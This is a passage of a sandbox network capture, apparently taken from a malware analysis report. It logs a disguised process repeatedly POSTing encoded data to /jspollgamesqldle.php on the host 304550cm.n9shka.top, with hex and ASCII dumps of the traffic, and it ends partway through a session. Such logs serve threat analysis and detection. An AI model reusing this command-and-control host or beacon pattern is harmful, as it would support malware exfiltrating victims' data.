                                                          Data Ascii: []YVZ[^Z\ZQVWYW]P_^[T_SATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&,!]>:(#0'*?7%<9;%952(@'$']9;#G X/)
                                                          Sep 8, 2024 11:52:51.471774101 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:51.681163073 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:51 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          54192.168.2.46474480.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:51.809571028 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:52.165838957 CEST2532OUTData Raw: 5b 50 5c 5f 5f 58 5b 51 5c 5a 51 56 57 5d 57 5d 50 5b 5e 5d 54 5a 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [P\__X[Q\ZQVW]W]P[^]TZSHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%;!>=4 X)3\'*8$S$9;^"-)^<6+^0:#G X/9
                                                          Sep 8, 2024 11:52:52.478072882 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:52.678463936 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:52 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          55192.168.2.46474580.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:52.813249111 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:53.166174889 CEST2532OUTData Raw: 5b 5d 5c 56 5a 58 5e 5b 5c 5a 51 56 57 5f 57 55 50 5c 5e 59 54 55 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: []\VZX^[\ZQVW_WUP\^YTUSITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%81)\ 0+>?+Y$<587#'6.![<%#'/;#G X/1
                                                          Sep 8, 2024 11:52:53.480302095 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:53.612720966 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:52 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          56192.168.2.46474680.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:53.746280909 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:54.103331089 CEST2532OUTData Raw: 5b 5f 59 54 5a 5e 5e 5a 5c 5a 51 56 57 5e 57 5c 50 50 5e 59 54 5f 53 40 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [_YTZ^^Z\ZQVW^W\PP^YT_S@TRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%;1%^)4 0<[*3)8$,$?^!_+ $,-+#G X/5
                                                          Sep 8, 2024 11:52:54.430629969 CEST25INHTTP/1.1 100 Continue


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          57192.168.2.46474780.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:54.547180891 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1400
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:54.900271893 CEST1400OUTData Raw: 5b 5b 5c 51 5a 5f 5e 5b 5c 5a 51 56 57 5b 57 56 50 58 5e 59 54 5a 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [[\QZ_^[\ZQVW[WVPX^YTZSCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%81!_>8 (Z*?#\3\/7'$ #=5X<,07$[/+#G X/-
                                                          Sep 8, 2024 11:52:55.230669022 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:55.432596922 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 26 54 33 3c 26 00 22 58 2b 55 2a 3f 21 1f 2d 2d 0e 5b 3d 00 29 44 29 30 20 52 3e 2f 0b 00 3e 2b 22 1a 2b 2f 23 02 20 21 01 11 25 0f 28 5e 03 11 23 1c 36 3e 32 13 2a 17 04 58 3d 22 3c 14 3d 01 2f 59 23 34 24 1d 37 3b 38 58 34 38 08 1a 28 5f 2e 55 38 37 25 44 2e 55 39 08 36 34 2d 57 0c 12 20 56 29 3d 20 0b 23 1d 21 5f 26 10 39 58 27 36 00 5e 28 3b 31 08 3f 28 32 58 31 21 34 0c 33 2d 25 12 29 06 3a 14 33 07 28 02 21 3d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: &T3<&"X+U*?!--[=)D)0 R>/>+"+/# !%(^#6>2*X="<=/Y#4$7;8X48(_.U87%D.U964-W V)= #!_&9X'6^(;1?(2X1!43-%):3(!=$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          58192.168.2.46474880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:54.668401957 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:55.026333094 CEST2532OUTData Raw: 5b 58 5c 56 5f 5a 5e 58 5c 5a 51 56 57 5c 57 53 50 50 5e 5e 54 5e 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [X\V_Z^X\ZQVW\WSPP^^T^SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&;!)_?98! <*+3?/4?R$;[6>6<%/$ Z:+#G X/
                                                          Sep 8, 2024 11:52:55.335742950 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:55.536885023 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          59192.168.2.46474980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:55.668061972 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:56.025175095 CEST2532OUTData Raw: 5b 5c 5c 56 5a 5b 5e 5a 5c 5a 51 56 57 5d 57 5d 50 59 5e 5f 54 5b 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [\\VZ[^Z\ZQVW]W]PY^_T[SHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%_.".=?^ <Z*/<$<*/B7%*'"(#_0Q+9#G X/9
                                                          Sep 8, 2024 11:52:56.349761009 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:56.480427027 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:55 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          60192.168.2.46475080.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:56.606375933 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:56.962762117 CEST2532OUTData Raw: 5e 5a 5c 52 5f 59 5b 5f 5c 5a 51 56 57 5e 57 56 50 58 5e 5e 54 55 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^Z\R_Y[_\ZQVW^WVPX^^TUSITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%Z/2")\ 8])<00/=^/+':(6.%Y+0.#G X/5
                                                          Sep 8, 2024 11:52:57.477365017 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:57.478491068 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          61192.168.2.46475180.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:57.605982065 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:57.962711096 CEST2532OUTData Raw: 5e 5b 5c 50 5a 58 5b 5e 5c 5a 51 56 57 5f 57 50 50 51 5e 50 54 54 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^[\PZX[^\ZQVW_WPPQ^PTTSDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%,1*=##(Z=,+'<*/$;R$<">!^+5'['74Z-#G X/1
                                                          Sep 8, 2024 11:52:58.298803091 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:58.434309006 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:57 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          62192.168.2.46475280.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:58.560159922 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:58.915844917 CEST2532OUTData Raw: 5e 5d 5c 56 5f 5e 5b 58 5c 5a 51 56 57 53 57 5d 50 58 5e 50 54 5b 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]\V_^[X\ZQVWSW]PX^PT[SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&;!)_>_7^ #,*+Y$,'09;Y5=_<+$4[-+#G X/
                                                          Sep 8, 2024 11:52:59.222522020 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:59.437028885 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:58 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          63192.168.2.46475380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:59.559429884 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:59.915791988 CEST2528OUTData Raw: 5e 5d 5c 51 5f 5e 5e 5d 5c 5a 51 56 57 5b 57 57 50 51 5e 5e 54 5c 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]\Q_^^]\ZQVW[WWPQ^^T\SATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%],)9;4##></Y3?!/4';!-1(@$$ -#G X/)
                                                          Sep 8, 2024 11:53:00.233508110 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:00.441806078 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:59 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          64192.168.2.46475480.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:00.453584909 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1400
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:00.808160067 CEST1400OUTData Raw: 5e 5a 59 52 5f 5f 5b 5b 5c 5a 51 56 57 5b 57 57 50 59 5e 5a 54 5c 53 45 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^ZYR__[[\ZQVW[WWPY^ZT\SETRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&;1^)( 0Z>?#01_;;W$4#.[(&$7:;#G X/)
                                                          Sep 8, 2024 11:53:01.137973070 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:01.342783928 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:00 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 25 0a 30 11 0c 02 20 2e 2c 0f 3e 2c 31 51 3a 13 2f 01 2a 39 39 43 2a 20 34 52 2a 3c 31 02 3d 15 36 18 29 2c 2c 5b 20 32 2c 05 31 1f 28 5e 03 11 23 5b 35 10 3e 5e 29 07 21 00 28 21 2c 5d 3d 3c 30 00 36 34 0e 52 21 3b 34 5e 20 28 22 51 29 2a 31 09 3b 42 21 41 3a 23 2a 55 22 24 2d 57 0c 12 20 57 3c 2d 34 0b 37 33 26 01 31 3d 25 58 30 26 2a 1d 3e 16 3a 51 3c 16 3d 04 25 54 27 1d 24 3d 39 58 29 3b 22 5f 33 07 27 12 35 07 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: %0 .,>,1Q:/*99C* 4R*<1=6),,[ 2,1(^#[5>^)!(!,]=<064R!;4^ ("Q)*1;B!A:#*U"$-W W<-473&1=%X0&*>:Q<=%T'$=9X);"_3'5$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          65192.168.2.46475580.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:00.582159996 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:00.931631088 CEST2532OUTData Raw: 5b 58 59 54 5f 5e 5e 5a 5c 5a 51 56 57 52 57 50 50 5d 5e 5d 54 5d 53 42 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [XYT_^^Z\ZQVWRWPP]^]T]SBTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%[."-]>9/#>^3?",7;S'#">.<6$$<-+#G X/
                                                          Sep 8, 2024 11:53:01.241775990 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:01.368607998 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:00 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          66192.168.2.46475680.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:01.496551037 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:01.853368998 CEST2532OUTData Raw: 5b 5f 59 55 5a 59 5e 5d 5c 5a 51 56 57 5f 57 52 50 51 5e 5d 54 5a 53 45 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [_YUZY^]\ZQVW_WRPQ^]TZSETRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%.!=9'!0Z(?,$/68483_85)?@'044.#G X/1
                                                          Sep 8, 2024 11:53:02.168904066 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:02.374027967 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:01 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          67192.168.2.46475780.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:53:02.497122049 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
